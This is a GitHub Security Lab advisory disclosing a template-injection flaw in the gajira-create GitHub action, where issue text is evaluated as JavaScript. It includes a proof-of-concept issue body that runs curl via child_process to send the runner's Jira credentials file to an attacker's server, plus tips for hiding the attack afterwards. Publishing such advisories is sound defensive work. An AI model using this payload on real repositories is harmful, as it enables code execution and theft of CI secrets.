skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
December 3, 2020

GHSL-2020-172: Undocumented template expression evaluation in the gajira-create GitHub action - CVE-2020-14188

Jaroslav Lobacevski


The gajira-create GitHub action supports undocumented template syntax that may lead to arbitrary code execution.


gajira-create GitHub action

Tested Version



Issue: The potentially untrusted input values summary and description are evaluated as code by node.js

The action supports additional template transformation of the summary and description input values - all placeholders between double braces like `` are replaced with the according values from github.event context. The intention most probably was to use it like:

uses: atlassian/gajira-create@v2.0.0
    summary: |
    Issue {{ event.issue.title }} created by {{ event.issue.user.login }}
    description: |
    {{ event.issue.body }}

i.e. without the dollar sign and the root github context object.

However this feature is not documented and the built-in GitHub context expressions are used by the users of the action instead, like:

uses: atlassian/gajira-create@v2.0.0
    summary: |
    ${{ github.event.issue.title }}
    description: |
    ${{ github.event.issue.body }}

This may lead to a double template evaluation if the user input contains {{}} itself. There is even a public issue created by one of the action users that proves it does happen.

The internal template feature is implemented in a way that the user input is interpreted as javascript:

const _ = require('lodash')

_.templateSettings.interpolate = /{{([\s\S]+?)}}/g
const summaryTmpl = _.template(this.argv.summary)
const descriptionTmpl = _.template(this.argv.description)

this.argv.summary = summaryTmpl({ event: this.githubEvent })
this.argv.description = descriptionTmpl({ event: this.githubEvent })


This vulnerability allows for arbitrary code execution in the context of a GitHub runner. For example a user may create an issue with the title It doesn't work on my machine and the body

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the issue to Never mind my bad. and close it.



Coordinated Disclosure Timeline


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-172 in any communication regarding this issue.